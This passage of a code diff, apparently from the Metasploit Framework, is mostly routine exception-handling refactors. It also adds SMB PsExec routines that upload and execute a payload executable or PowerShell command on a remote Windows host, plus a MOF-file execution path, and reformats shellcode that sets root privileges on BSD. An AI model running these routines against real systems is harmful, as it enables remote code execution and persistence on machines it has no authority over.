rescue => e
|
||||
elog "open struct conversion failed #{e.message}"
|
||||
end
|
||||
end
|
||||
|
@ -64,7 +64,7 @@ module ResponseDataHelper
|
|||
end
|
||||
return rv
|
||||
end
|
||||
rescue Exception => e
|
||||
rescue => e
|
||||
elog "Mdm Object conversion failed #{e.message}"
|
||||
e.backtrace.each { |line| elog "#{line}\n" }
|
||||
end
|
||||
|
@ -87,7 +87,7 @@ module ResponseDataHelper
|
|||
unless File.exists?(save_path) && File.read(save_path) == decoded_file
|
||||
File.open(save_path, 'w+') { |file| file.write(decoded_file) }
|
||||
end
|
||||
rescue Exception => e
|
||||
rescue => e
|
||||
elog "There was an error writing the file: #{e}"
|
||||
e.backtrace.each { |line| elog "#{line}\n"}
|
||||
end
|
||||
|
|
|
@ -1,19 +1,19 @@
|
|||
module NoteDataService
|
||||
|
||||
def notes(opts)
|
||||
raise NotImplementedError, 'NoteDataService#notes is not implemented'
|
||||
raise 'NoteDataService#notes is not implemented'
|
||||
end
|
||||
|
||||
def report_note(opts)
|
||||
raise NotImplementedError, 'NoteDataService#report_note is not implemented'
|
||||
raise 'NoteDataService#report_note is not implemented'
|
||||
end
|
||||
|
||||
def update_note(opts)
|
||||
raise NotImplementedError, 'NoteDataService#update_note is not implemented'
|
||||
raise 'NoteDataService#update_note is not implemented'
|
||||
end
|
||||
|
||||
def delete_note(opts)
|
||||
raise NotImplementedError, 'NoteDataService#delete_note is not implemented'
|
||||
raise 'NoteDataService#delete_note is not implemented'
|
||||
end
|
||||
|
||||
end
|
|
@ -5,7 +5,7 @@ module Metasploit
|
|||
module Framework
|
||||
module LoginScanner
|
||||
|
||||
class BavisionCamerasException < Exception; end
|
||||
class BavisionCamerasException < StandardError; end
|
||||
|
||||
class BavisionCameras < HTTP
|
||||
|
||||
|
|
|
@ -235,12 +235,13 @@ class DataStore < Hash
|
|||
# Override merge! so that we merge the aliases and imported hashes
|
||||
#
|
||||
def merge!(other)
|
||||
super
|
||||
if other.is_a? DataStore
|
||||
self.aliases.merge!(other.aliases)
|
||||
self.imported.merge!(other.imported)
|
||||
self.imported_by.merge!(other.imported_by)
|
||||
end
|
||||
# call super last so that we return a reference to ourselves
|
||||
super
|
||||
end
|
||||
|
||||
#
|
||||
|
|
|
@ -20,7 +20,7 @@ class JobProcessor
|
|||
wrapper = @job_queue.pop()
|
||||
begin
|
||||
wrapper.job.call(wrapper.job_args)
|
||||
rescue Exception => e
|
||||
rescue => e
|
||||
print_error "Error executing job #{e.message}", e
|
||||
end
|
||||
end
|
||||
|
|
|
@ -27,7 +27,7 @@ module CredentialServlet
|
|||
response << json
|
||||
end
|
||||
set_json_response(response)
|
||||
rescue Exception => e
|
||||
rescue => e
|
||||
set_error_on_response(e)
|
||||
end
|
||||
}
|
||||
|
|
|
@ -24,7 +24,7 @@ module DbExportServlet
|
|||
response = {}
|
||||
response[:db_export_file] = encoded_file
|
||||
set_json_response(response)
|
||||
rescue Exception => e
|
||||
rescue => e
|
||||
set_error_on_response(e)
|
||||
ensure
|
||||
# Ensure the temporary file gets cleaned up
|
||||
|
|
|
@ -32,7 +32,7 @@ module HostServlet
|
|||
data = get_db.hosts(sanitized_params)
|
||||
includes = [:loots]
|
||||
set_json_response(data, includes)
|
||||
rescue Exception => e
|
||||
rescue => e
|
||||
set_error_on_response(e)
|
||||
end
|
||||
}
|
||||
|
@ -45,7 +45,7 @@ module HostServlet
|
|||
data = get_db.report_host(opts)
|
||||
}
|
||||
exec_report_job(request, &job)
|
||||
rescue Exception => e
|
||||
rescue => e
|
||||
set_error_on_response(e)
|
||||
end
|
||||
}
|
||||
|
@ -59,7 +59,7 @@ module HostServlet
|
|||
opts[:id] = tmp_params[:id] if tmp_params[:id]
|
||||
data = get_db.update_host(opts)
|
||||
set_json_response(data)
|
||||
rescue Exception => e
|
||||
rescue => e
|
||||
set_error_on_response(e)
|
||||
end
|
||||
}
|
||||
|
@ -71,7 +71,7 @@ module HostServlet
|
|||
opts = parse_json_request(request, false)
|
||||
data = get_db.delete_host(opts)
|
||||
set_json_response(data)
|
||||
rescue Exception => e
|
||||
rescue => e
|
||||
set_error_on_response(e)
|
||||
end
|
||||
}
|
||||
|
|
|
@ -30,7 +30,7 @@ module LootServlet
|
|||
loot.data = Base64.urlsafe_encode64(loot.data) if loot.data
|
||||
end
|
||||
set_json_response(data, includes)
|
||||
rescue Exception => e
|
||||
rescue => e
|
||||
set_error_on_response(e)
|
||||
end
|
||||
}
|
||||
|
@ -60,7 +60,7 @@ module LootServlet
|
|||
opts[:id] = tmp_params[:id] if tmp_params[:id]
|
||||
data = get_db.update_loot(opts)
|
||||
set_json_response(data)
|
||||
rescue Exception => e
|
||||
rescue => e
|
||||
set_error_on_response(e)
|
||||
end
|
||||
}
|
||||
|
@ -72,7 +72,7 @@ module LootServlet
|
|||
opts = parse_json_request(request, false)
|
||||
data = get_db.delete_loot(opts)
|
||||
set_json_response(data)
|
||||
rescue Exception => e
|
||||
rescue => e
|
||||
set_error_on_response(e)
|
||||
end
|
||||
}
|
||||
|
|
|
@ -27,7 +27,7 @@ module NoteServlet
|
|||
data = get_db.notes(sanitized_params)
|
||||
includes = [:host]
|
||||
set_json_response(data, includes)
|
||||
rescue Exception => e
|
||||
rescue => e
|
||||
set_error_on_response(e)
|
||||
end
|
||||
}
|
||||
|
@ -40,7 +40,7 @@ module NoteServlet
|
|||
get_db.report_note(opts)
|
||||
}
|
||||
exec_report_job(request, &job)
|
||||
rescue Exception => e
|
||||
rescue => e
|
||||
set_error_on_response(e)
|
||||
end
|
||||
}
|
||||
|
@ -54,7 +54,7 @@ module NoteServlet
|
|||
opts[:id] = tmp_params[:id] if tmp_params[:id]
|
||||
data = get_db.update_note(opts)
|
||||
set_json_response(data)
|
||||
rescue Exception => e
|
||||
rescue => e
|
||||
set_error_on_response(e)
|
||||
end
|
||||
}
|
||||
|
@ -66,7 +66,7 @@ module NoteServlet
|
|||
opts = parse_json_request(request, false)
|
||||
data = get_db.delete_note(opts)
|
||||
set_json_response(data)
|
||||
rescue Exception => e
|
||||
rescue => e
|
||||
set_error_on_response(e)
|
||||
end
|
||||
}
|
||||
|
|
|
@ -26,7 +26,7 @@ module ServiceServlet
|
|||
data = get_db.services(opts)
|
||||
includes = [:host]
|
||||
set_json_response(data, includes)
|
||||
rescue Exception => e
|
||||
rescue => e
|
||||
set_error_on_response(e)
|
||||
end
|
||||
}
|
||||
|
@ -48,7 +48,7 @@ module ServiceServlet
|
|||
opts[:id] = tmp_params[:id] if tmp_params[:id]
|
||||
data = get_db.update_service(opts)
|
||||
set_json_response(data)
|
||||
rescue Exception => e
|
||||
rescue => e
|
||||
set_error_on_response(e)
|
||||
end
|
||||
}
|
||||
|
@ -60,7 +60,7 @@ module ServiceServlet
|
|||
opts = parse_json_request(request, false)
|
||||
data = get_db.delete_service(opts)
|
||||
set_json_response(data)
|
||||
rescue Exception => e
|
||||
rescue => e
|
||||
set_error_on_response(e)
|
||||
end
|
||||
}
|
||||
|
|
|
@ -19,7 +19,7 @@ module SessionEventServlet
|
|||
opts = parse_json_request(request, false)
|
||||
data = get_db().session_events(opts)
|
||||
set_json_response(data)
|
||||
rescue Exception => e
|
||||
rescue => e
|
||||
set_error_on_response(e)
|
||||
end
|
||||
}
|
||||
|
|
|
@ -18,7 +18,7 @@ module SessionServlet
|
|||
#opts = parse_json_request(request, false)
|
||||
data = get_db().get_all_sessions()
|
||||
set_json_response(data)
|
||||
rescue Exception => e
|
||||
rescue => e
|
||||
set_error_on_response(e)
|
||||
end
|
||||
}
|
||||
|
|
|
@ -23,7 +23,7 @@ module VulnAttemptServlet
|
|||
opts = parse_json_request(request, false)
|
||||
data = get_db.vuln_attempts(params.symbolize_keys)
|
||||
set_json_response(data)
|
||||
rescue Exception => e
|
||||
rescue => e
|
||||
set_error_on_response(e)
|
||||
end
|
||||
}
|
||||
|
@ -39,7 +39,7 @@ module VulnAttemptServlet
|
|||
get_db.report_vuln_attempt(vuln, opts)
|
||||
}
|
||||
exec_report_job(request, &job)
|
||||
rescue Exception => e
|
||||
rescue => e
|
||||
set_error_on_response(e)
|
||||
end
|
||||
}
|
||||
|
|
|
@ -27,7 +27,7 @@ module VulnServlet
|
|||
data = get_db.vulns(sanitized_params)
|
||||
includes = [:host, :vulns_refs, :refs, :module_refs]
|
||||
set_json_response(data, includes)
|
||||
rescue Exception => e
|
||||
rescue => e
|
||||
set_error_on_response(e)
|
||||
end
|
||||
}
|
||||
|
@ -40,7 +40,7 @@ module VulnServlet
|
|||
get_db.report_vuln(opts)
|
||||
}
|
||||
exec_report_job(request, &job)
|
||||
rescue Exception => e
|
||||
rescue => e
|
||||
set_error_on_response(e)
|
||||
end
|
||||
}
|
||||
|
@ -54,7 +54,7 @@ module VulnServlet
|
|||
opts[:id] = tmp_params[:id] if tmp_params[:id]
|
||||
data = get_db.update_vuln(opts)
|
||||
set_json_response(data)
|
||||
rescue Exception => e
|
||||
rescue => e
|
||||
set_error_on_response(e)
|
||||
end
|
||||
}
|
||||
|
@ -66,7 +66,7 @@ module VulnServlet
|
|||
opts = parse_json_request(request, false)
|
||||
data = get_db.delete_vuln(opts)
|
||||
set_json_response(data)
|
||||
rescue Exception => e
|
||||
rescue => e
|
||||
set_error_on_response(e)
|
||||
end
|
||||
}
|
||||
|
|
|
@ -29,7 +29,7 @@ module WorkspaceServlet
|
|||
data = get_db.workspaces(sanitized_params)
|
||||
|
||||
set_json_response(data, includes)
|
||||
rescue Exception => e
|
||||
rescue => e
|
||||
set_error_on_response(e)
|
||||
end
|
||||
}
|
||||
|
@ -41,7 +41,7 @@ module WorkspaceServlet
|
|||
opts = parse_json_request(request, true)
|
||||
workspace = get_db.add_workspace(opts)
|
||||
set_json_response(workspace)
|
||||
rescue Exception => e
|
||||
rescue => e
|
||||
set_error_on_response(e)
|
||||
end
|
||||
}
|
||||
|
@ -55,7 +55,7 @@ module WorkspaceServlet
|
|||
opts[:id] = tmp_params[:id] if tmp_params[:id]
|
||||
data = get_db.update_workspace(opts)
|
||||
set_json_response(data)
|
||||
rescue Exception => e
|
||||
rescue => e
|
||||
set_error_on_response(e)
|
||||
end
|
||||
}
|
||||
|
@ -67,7 +67,7 @@ module WorkspaceServlet
|
|||
opts = parse_json_request(request, false)
|
||||
data = get_db.delete_workspaces(opts)
|
||||
set_json_response(data)
|
||||
rescue Exception => e
|
||||
rescue => e
|
||||
set_error_on_response(e)
|
||||
end
|
||||
}
|
||||
|
|
|
@ -47,7 +47,7 @@ module ServletHelper
|
|||
return set_json_response(data, includes)
|
||||
end
|
||||
|
||||
rescue Exception => e
|
||||
rescue => e
|
||||
set_error_on_response(e)
|
||||
end
|
||||
end
|
||||
|
|
|
@ -2,6 +2,8 @@
|
|||
require 'rex/proto/dcerpc/svcctl'
|
||||
require 'windows_error'
|
||||
require 'windows_error/win32'
|
||||
require 'msf/core/exploit/exe'
|
||||
require 'msf/core/exploit/wbemexec'
|
||||
|
||||
include WindowsError::Win32
|
||||
|
||||
|
@ -20,6 +22,7 @@ module Exploit::Remote::SMB::Client::Psexec
|
|||
include Msf::Exploit::Windows_Constants
|
||||
include Msf::Exploit::Remote::DCERPC
|
||||
include Msf::Exploit::Remote::SMB::Client::Authenticated
|
||||
include Msf::Exploit::Failure
|
||||
|
||||
def initialize(info = {})
|
||||
super
|
||||
|
@ -193,6 +196,246 @@ module Exploit::Remote::SMB::Client::Psexec
|
|||
true
|
||||
end
|
||||
|
||||
end
|
||||
def powershell_installed?(smb_share, psh_path)
|
||||
share = "\\\\#{datastore['RHOST']}\\#{smb_share}"
|
||||
|
||||
case smb_share.upcase
|
||||
when 'ADMIN$'
|
||||
path = 'System32\\WindowsPowerShell\\v1.0\\powershell.exe'
|
||||
when 'C$'
|
||||
path = 'Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe'
|
||||
else
|
||||
path = psh_path
|
||||
end
|
||||
|
||||
simple.connect(share)
|
||||
vprint_status("Checking for #{path}")
|
||||
if smb_file_exist?(path)
|
||||
vprint_status('PowerShell found')
|
||||
psh = true
|
||||
else
|
||||
vprint_status('PowerShell not found')
|
||||
psh = false
|
||||
end
|
||||
|
||||
simple.disconnect(share)
|
||||
psh
|
||||
end
|
||||
|
||||
def execute_command(text, bat, cmd)
|
||||
# Try and execute the provided command
|
||||
execute = "%COMSPEC% /C echo #{cmd} ^> %SYSTEMDRIVE%#{text} > #{bat} & %COMSPEC% /C start %COMSPEC% /C #{bat}"
|
||||
vprint_status("Executing the command...")
|
||||
begin
|
||||
return psexec(execute)
|
||||
rescue Rex::Proto::DCERPC::Exceptions::Error, Rex::Proto::SMB::Exceptions::Error => e
|
||||
elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}", 'rex', LEV_3)
|
||||
print_error("Unable to execute specified command: #{e}")
|
||||
return false
|
||||
end
|
||||
end
|
||||
|
||||
def execute_command_with_output(text, bat, cmd, smb_share, r_ip, delay, rt)
|
||||
res = execute_command(text, bat, cmd)
|
||||
if res
|
||||
for i in 0..(rt)
|
||||
Rex.sleep(delay)
|
||||
# if the output file is still locked then the program is still likely running
|
||||
if (exclusive_access(text, smb_share, r_ip))
|
||||
break
|
||||
elsif (i == rt)
|
||||
print_error("Command seems to still be executing. Try increasing RETRY and DELAY")
|
||||
end
|
||||
end
|
||||
output = get_output(text, smb_share, r_ip)
|
||||
end
|
||||
|
||||
cleanup_after(bat, smb_share, r_ip)
|
||||
output
|
||||
end
|
||||
|
||||
def execute_powershell_payload
|
||||
ENV['MSF_SERVICENAME'] = datastore['SERVICE_NAME']
|
||||
command = cmd_psh_payload(payload.encoded, payload_instance.arch.first)
|
||||
|
||||
if datastore['PSH::persist'] and not datastore['DisablePayloadHandler']
|
||||
print_warning("You probably want to DisablePayloadHandler and use exploit/multi/handler with the PSH::persist option")
|
||||
end
|
||||
|
||||
# Execute the powershell command
|
||||
print_status("Executing the payload...")
|
||||
begin
|
||||
psexec(command)
|
||||
rescue StandardError => exec_command_error
|
||||
fail_with(Msf::Exploit::Failure::Unknown, "#{peer} - Unable to execute specified command: #{exec_command_error}")
|
||||
end
|
||||
end
|
||||
|
||||
def native_upload(smb_share)
|
||||
filename = "#{rand_text_alpha(8)}.exe"
|
||||
serviceencoder = ''
|
||||
|
||||
# Upload the shellcode to a file
|
||||
print_status("Uploading payload...")
|
||||
smbshare = smb_share
|
||||
fileprefix = ""
|
||||
# if SHARE = Users/sasha/ or something like this
|
||||
if smbshare =~ /.[\\\/]/
|
||||
subfolder = true
|
||||
smbshare = smb_share.dup
|
||||
smbshare = smbshare.gsub(/^[\\\/]/,"")
|
||||
folder_list = smbshare.split(/[\\\/]/)
|
||||
smbshare = folder_list[0]
|
||||
fileprefix = folder_list[1..-1].map {|a| a + "\\"}.join.gsub(/\\$/,"") if folder_list.length > 1
|
||||
simple.connect("\\\\#{datastore['RHOST']}\\#{smbshare}")
|
||||
fd = smb_open("\\#{fileprefix}\\#{filename}", 'rwct')
|
||||
else
|
||||
subfolder = false
|
||||
simple.connect("\\\\#{datastore['RHOST']}\\#{smbshare}")
|
||||
fd = smb_open("\\#{filename}", 'rwct')
|
||||
end
|
||||
exe = ''
|
||||
opts = { :servicename => service_name, :serviceencoder => serviceencoder}
|
||||
begin
|
||||
exe = generate_payload_exe_service(opts)
|
||||
|
||||
fd << exe
|
||||
ensure
|
||||
fd.close
|
||||
end
|
||||
|
||||
if subfolder
|
||||
print_status("Created \\#{fileprefix}\\#{filename}...")
|
||||
else
|
||||
print_status("Created \\#{filename}...")
|
||||
end
|
||||
|
||||
# Disconnect from the share
|
||||
simple.disconnect("\\\\#{datastore['RHOST']}\\#{smbshare}")
|
||||
|
||||
# define the file location
|
||||
if smb_share == 'ADMIN$'
|
||||
file_location = "%SYSTEMROOT%\\#{filename}"
|
||||
elsif smb_share =~ /^[a-zA-Z]\$$/
|
||||
file_location = smb_share.slice(0,1) + ":\\#{filename}"
|
||||
else
|
||||
file_location = "\\\\127.0.0.1\\#{smbshare}\\#{fileprefix}\\#{filename}"
|
||||
end
|
||||
|
||||
psexec(file_location, false)
|
||||
|
||||
unless datastore['SERVICE_PERSIST']
|
||||
print_status("Deleting \\#{filename}...")
|
||||
#This is not really useful but will prevent double \\ on the wire :)
|
||||
if smb_share =~ /.[\\\/]/
|
||||
simple.connect("\\\\#{datastore['RHOST']}\\#{smbshare}")
|
||||
begin
|
||||
simple.delete("\\#{fileprefix}\\#{filename}")
|
||||
rescue XCEPT::ErrorCode => e
|
||||
print_error("Delete of \\#{fileprefix}\\#{filename} failed: #{e.message}")
|
||||
end
|
||||
else
|
||||
simple.connect("\\\\#{datastore['RHOST']}\\#{smbshare}")
|
||||
begin
|
||||
simple.delete("\\#{filename}")
|
||||
rescue XCEPT::ErrorCode => e
|
||||
print_error("Delete of \\#{filename} failed: #{e.message}")
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
def mof_upload(smb_share)
|
||||
share = "\\\\#{datastore['RHOST']}\\ADMIN$"
|
||||
filename = "#{rand_text_alpha(8)}.exe"
|
||||
|
||||
# payload as exe
|
||||
print_status("Trying wbemexec...")
|
||||
print_status("Uploading Payload...")
|
||||
if smb_share != 'ADMIN$'
|
||||
print_error('Wbem will only work with ADMIN$ share')
|
||||
return
|
||||
end
|
||||
simple.connect(share)
|
||||
exe = generate_payload_exe
|
||||
fd = smb_open("\\system32\\#{filename}", 'rwct')
|
||||
fd << exe
|
||||
fd.close
|
||||
print_status("Created %SystemRoot%\\system32\\#{filename}")
|
||||
|
||||
# mof to cause execution of above
|
||||
mofname = rand_text_alphanumeric(14) + ".MOF"
|
||||
mof = generate_mof(mofname, filename)
|
||||
print_status("Uploading MOF...")
|
||||
fd = smb_open("\\system32\\wbem\\mof\\#{mofname}", 'rwct')
|
||||
fd << mof
|
||||
fd.close
|
||||
print_status("Created %SystemRoot%\\system32\\wbem\\mof\\#{mofname}")
|
||||
|
||||
# Disconnect from the ADMIN$
|
||||
simple.disconnect(share)
|
||||
end
|
||||
|
||||
private
|
||||
# Retrive output from command
|
||||
def get_output(file, smb_share, r_ip)
|
||||
print_status("Getting the command output...")
|
||||
output = smb_read_file(smb_share, r_ip, file)
|
||||
if output.nil?
|
||||
print_error("Error getting command output. #{$!.class}. #{$!}.")
|
||||
return
|
||||
end
|
||||
if output.empty?
|
||||
print_status("Command finished with no output")
|
||||
return
|
||||
end
|
||||
output
|
||||
end
|
||||
|
||||
# check if our process is done using these files
|
||||
def exclusive_access(*files, smb_share, r_ip)
|
||||
begin
|
||||
simple.connect("\\\\#{r_ip}\\#{smb_share}")
|
||||
rescue Rex::Proto::SMB::Exceptions::ErrorCode => accesserror
|
||||
print_status("Unable to get handle: #{accesserror}")
|
||||
return false
|
||||
end
|
||||
files.each do |file|
|
||||
begin
|
||||
print_status("checking if the file is unlocked")
|
||||
fd = smb_open(file, 'rwo')
|
||||
fd.close
|
||||
rescue Rex::Proto::SMB::Exceptions::ErrorCode => accesserror
|
||||
print_status("Unable to get handle: #{accesserror}")
|
||||
return false
|
||||
end
|
||||
simple.disconnect("\\\\#{r_ip}\\#{smb_share}")
|
||||
end
|
||||
return true
|
||||
end
|
||||
|
||||
def cleanup_after(*files, smb_share, r_ip)
|
||||
begin
|
||||
simple.connect("\\\\#{r_ip}\\#{smb_share}")
|
||||
rescue Rex::Proto::SMB::Exceptions::ErrorCode => accesserror
|
||||
print_error("Unable to connect for cleanup: #{accesserror}. Maybe you'll need to manually remove #{files.join(", "
|
||||
)} from the target.")
|
||||
return
|
||||
end
|
||||
print_status("Executing cleanup...")
|
||||
files.each do |file|
|
||||
begin
|
||||
smb_file_rm(file)
|
||||
rescue Rex::Proto::SMB::Exceptions::ErrorCode => cleanuperror
|
||||
print_error("Unable to cleanup #{file}. Error: #{cleanuperror}")
|
||||
end
|
||||
end
|
||||
left = files.collect{ |f| smb_file_exist?(f) }
|
||||
if left.any?
|
||||
print_error("Unable to cleanup. Maybe you'll need to manually remove #{left.join(", ")} from the target.")
|
||||
else
|
||||
print_good("Cleanup was successful")
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
|
|
|
@ -93,69 +93,69 @@ module Msf::Payload::Bsd
|
|||
def handle_x64_bsd_opts(pre, app)
|
||||
if (datastore['PrependSetresuid'])
|
||||
# setresuid(0, 0, 0)
|
||||
pre << "\x48\x31\xc0" +# xor rax, rax
|
||||
"\x48\x83\xc8\x4d" +# or rax, 77 (setgid=311>>2=77)
|
||||
"\x48\xc1\xe0\x02" +# shl rax, 2
|
||||
"\x48\x83\xf0\x03" +# xor rax, 3 (311&3=3)
|
||||
"\x48\x31\xff" +# xor rdi, rdi 0
|
||||
"\x48\x31\xf6" +# xor rsi, rsi 0
|
||||
"\x48\x31\xd2" +# xor rdx, rdx 0
|
||||
"\x0f\x05" # syscall
|
||||
pre << "\x48\x31\xc0" + # xor rax, rax
|
||||
"\x48\x83\xc8\x4d" + # or rax, 77 (setgid=311>>2=77)
|
||||
"\x48\xc1\xe0\x02" + # shl rax, 2
|
||||
"\x48\x83\xf0\x03" + # xor rax, 3 (311&3=3)
|
||||
"\x48\x31\xff" + # xor rdi, rdi 0
|
||||
"\x48\x31\xf6" + # xor rsi, rsi 0
|
||||
"\x48\x31\xd2" + # xor rdx, rdx 0
|
||||
"\x0f\x05" # syscall
|
||||
end
|
||||
|
||||
if (datastore['PrependSetreuid'])
|
||||
# setreuid(0, 0)
|
||||
pre << "\x48\x31\xc0" +# xor rax, rax
|
||||
"\x48\x83\xc8\x7e" +# or rax, 126 (setreuid=126)
|
||||
"\x48\x31\xff" +# xor rdi, rdi 0
|
||||
"\x48\x31\xf6" +# xor rsi, rsi 0
|
||||
"\x0f\x05" # syscall
|
||||
pre << "\x48\x31\xc0" + # xor rax, rax
|
||||
"\x48\x83\xc8\x7e" + # or rax, 126 (setreuid=126)
|
||||
"\x48\x31\xff" + # xor rdi, rdi 0
|
||||
"\x48\x31\xf6" + # xor rsi, rsi 0
|
||||
"\x0f\x05" # syscall
|
||||
end
|
||||
|
||||
if (datastore['PrependSetuid'])
|
||||
# setuid(0)
|
||||
pre << "\x48\x31\xc0" +# xor rax, rax
|
||||
"\x48\x83\xc8\x17" +# or rax, 23 (setuid=23)
|
||||
"\x48\x31\xff" +# xor rdi, rdi 0
|
||||
"\x0f\x05" # syscall
|
||||
pre << "\x48\x31\xc0" + # xor rax, rax
|
||||
"\x48\x83\xc8\x17" + # or rax, 23 (setuid=23)
|
||||
"\x48\x31\xff" + # xor rdi, rdi 0
|
||||
"\x0f\x05" # syscall
|
||||
end
|
||||
|
||||
if (datastore['PrependSetresgid'])
|
||||
# setresgid(0, 0, 0)
|
||||
pre << "\x48\x31\xc0" +# xor rax, rax
|
||||
"\x48\x83\xc8\x4e" +# or rax, 78 (setgid=312>>2=78)
|
||||
"\x48\xc1\xe0\x02" +# shl rax, 2 (78<<2=312)
|
||||
"\x48\x31\xff" +# xor rdi, rdi 0
|
||||
"\x48\x31\xf6" +# xor rsi, rsi 0
|
||||
"\x48\x31\xd2" +# xor rdx, rdx 0
|
||||
"\x0f\x05" # syscall
|
||||
pre << "\x48\x31\xc0" + # xor rax, rax
|
||||
"\x48\x83\xc8\x4e" + # or rax, 78 (setgid=312>>2=78)
|
||||
"\x48\xc1\xe0\x02" + # shl rax, 2 (78<<2=312)
|
||||
"\x48\x31\xff" + # xor rdi, rdi 0
|
||||
"\x48\x31\xf6" + # xor rsi, rsi 0
|
||||
"\x48\x31\xd2" + # xor rdx, rdx 0
|
||||
"\x0f\x05" # syscall
|
||||
end
|
||||
|
||||
if (datastore['PrependSetregid'])
|
||||
# setregid(0, 0)
|
||||
pre << "\x48\x31\xc0" +# xor rax, rax
|
||||
"\x48\x83\xc8\x7f" +# or rax, 127 (setuid=127)
|
||||
"\x48\x31\xff" +# xor rdi, rdi 0
|
||||
"\x48\x31\xf6" +# xor rsi, rsi 0
|
||||
"\x0f\x05" # syscall
|
||||
pre << "\x48\x31\xc0" + # xor rax, rax
|
||||
"\x48\x83\xc8\x7f" + # or rax, 127 (setuid=127)
|
||||
"\x48\x31\xff" + # xor rdi, rdi 0
|
||||
"\x48\x31\xf6" + # xor rsi, rsi 0
|
||||
"\x0f\x05" # syscall
|
||||
end
|
||||
|
||||
if (datastore['PrependSetgid'])
|
||||
# setgid(0)
|
||||
pre << "\x48\x31\xc0" +# xor rax, rax
|
||||
"\x48\x83\xc8\x5a" +# or rax, 90 (setgid=181>>1=90)
|
||||
"\x48\xd1\xe0" +# shl rax, 1
|
||||
"\x48\x83\xc8\x01" +# or rax, 1 (setgid=181&1=1)
|
||||
"\x48\x31\xff" +# xor rdi, rdi 0
|
||||
"\x0f\x05" # syscall
|
||||
pre << "\x48\x31\xc0" + # xor rax, rax
|
||||
"\x48\x83\xc8\x5a" + # or rax, 90 (setgid=181>>1=90)
|
||||
"\x48\xd1\xe0" + # shl rax, 1
|
||||
"\x48\x83\xc8\x01" + # or rax, 1 (setgid=181&1=1)
|
||||
"\x48\x31\xff" + # xor rdi, rdi 0
|
||||
"\x0f\x05" # syscall
|
||||
end
|
||||
|
||||
if (datastore['AppendExit'])
|
||||
# exit(0)
|
||||
app << "\x48\x31\xc0" +# xor rax, rax
|
||||
"\x48\x83\xc8\x01" +# or rax, 1 (exit=1)
|
||||
"\x48\x31\xff" +# xor rdi, rdi 0
|
||||
"\x0f\x05" # syscall
|
||||
app << "\x48\x31\xc0" + # xor rax, rax
|
||||
"\x48\x83\xc8\x01" + # or rax, 1 (exit=1)
|
||||
"\x48\x31\xff" + # xor rdi, rdi 0
|
||||
"\x0f\x05" # syscall
|
||||
end
|
||||
end
|
||||
|
||||
|
|
|
@ -59,70 +59,70 @@ module X86
|
|||
def handle_x86_bsd_opts(pre, app)
|
||||
if (datastore['PrependSetresuid'])
|
||||
# setresuid(0, 0, 0)
|
||||
pre << "\x31\xc0" +# xorl %eax,%eax #
|
||||
"\x50" +# pushl %eax #
|
||||
"\x50" +# pushl %eax #
|
||||
"\x50" +# pushl %eax #
|
||||
"\x50" +# pushl %eax #
|
||||
"\x66\xb8\x37\x01" +# movw $0x0137,%ax #
|
||||
"\xcd\x80" # int $0x80 #
|
||||
pre << "\x31\xc0" + # xorl %eax,%eax #
|
||||
"\x50" + # pushl %eax #
|
||||
"\x50" + # pushl %eax #
|
||||
"\x50" + # pushl %eax #
|
||||
"\x50" + # pushl %eax #
|
||||
"\x66\xb8\x37\x01" + # movw $0x0137,%ax #
|
||||
"\xcd\x80" # int $0x80 #
|
||||
end
|
||||
|
||||
if (datastore['PrependSetreuid'])
|
||||
# setreuid(0, 0)
|
||||
pre << "\x31\xc0" +# xorl %eax,%eax #
|
||||
"\x50" +# pushl %eax #
|
||||
"\x50" +# pushl %eax #
|
||||
"\x50" +# pushl %eax #
|
||||
"\xb0\x7e" +# movb $0x7e,%al #
|
||||
"\xcd\x80" # int $0x80 #
|
||||
pre << "\x31\xc0" + # xorl %eax,%eax #
|
||||
"\x50" + # pushl %eax #
|
||||
"\x50" + # pushl %eax #
|
||||
"\x50" + # pushl %eax #
|
||||
"\xb0\x7e" + # movb $0x7e,%al #
|
||||
"\xcd\x80" # int $0x80 #
|
||||
end
|
||||
|
||||
if (datastore['PrependSetuid'])
|
||||
# setuid(0)
|
||||
pre << "\x31\xc0" +# xorl %eax,%eax #
|
||||
"\x50" +# pushl %eax #
|
||||
"\x50" +# pushl %eax #
|
||||
"\xb0\x17" +# movb $0x17,%al #
|
||||
"\xcd\x80" # int $0x80 #
|
||||
pre << "\x31\xc0" + # xorl %eax,%eax #
|
||||
"\x50" + # pushl %eax #
|
||||
"\x50" + # pushl %eax #
|
||||
"\xb0\x17" + # movb $0x17,%al #
|
||||
"\xcd\x80" # int $0x80 #
|
||||
end
|
||||
|
||||
if (datastore['PrependSetresgid'])
|
||||
# setresgid(0, 0, 0)
|
||||
pre << "\x31\xc0" +# xorl %eax,%eax #
|
||||
"\x50" +# pushl %eax #
|
||||
"\x50" +# pushl %eax #
|
||||
"\x50" +# pushl %eax #
|
||||
"\x50" +# pushl %eax #
|
||||
"\x66\xb8\x38\x01" +# movw $0x0138,%ax #
|
||||
"\xcd\x80" # int $0x80 #
|
||||
pre << "\x31\xc0" + # xorl %eax,%eax #
|
||||
"\x50" + # pushl %eax #
|
||||
"\x50" + # pushl %eax #
|
||||
"\x50" + # pushl %eax #
|
||||
"\x50" + # pushl %eax #
|
||||
"\x66\xb8\x38\x01" + # movw $0x0138,%ax #
|
||||
"\xcd\x80" # int $0x80 #
|
||||
end
|
||||
|
||||
if (datastore['PrependSetregid'])
|
||||
# setregid(0, 0)
|
||||
pre << "\x31\xc0" +# xorl %eax,%eax #
|
||||
"\x50" +# pushl %eax #
|
||||
"\x50" +# pushl %eax #
|
||||
"\x50" +# pushl %eax #
|
||||
"\xb0\x7f" +# movb $0x7f,%al #
|
||||
"\xcd\x80" # int $0x80 #
|
||||
pre << "\x31\xc0" + # xorl %eax,%eax #
|
||||
"\x50" + # pushl %eax #
|
||||
"\x50" + # pushl %eax #
|
||||
"\x50" + # pushl %eax #
|
||||
"\xb0\x7f" + # movb $0x7f,%al #
|
||||
"\xcd\x80" # int $0x80 #
|
||||
end
|
||||
|
||||
if (datastore['PrependSetgid'])
|
||||
# setgid(0)
|
||||
pre << "\x31\xc0" +# xorl %eax,%eax #
|
||||
"\x50" +# pushl %eax #
|
||||
"\x50" +# pushl %eax #
|
||||
"\xb0\xb5" +# movb $0xb5,%al #
|
||||
"\xcd\x80" # int $0x80 #
|
||||
pre << "\x31\xc0" + # xorl %eax,%eax #
|
||||
"\x50" + # pushl %eax #
|
||||
"\x50" + # pushl %eax #
|
||||
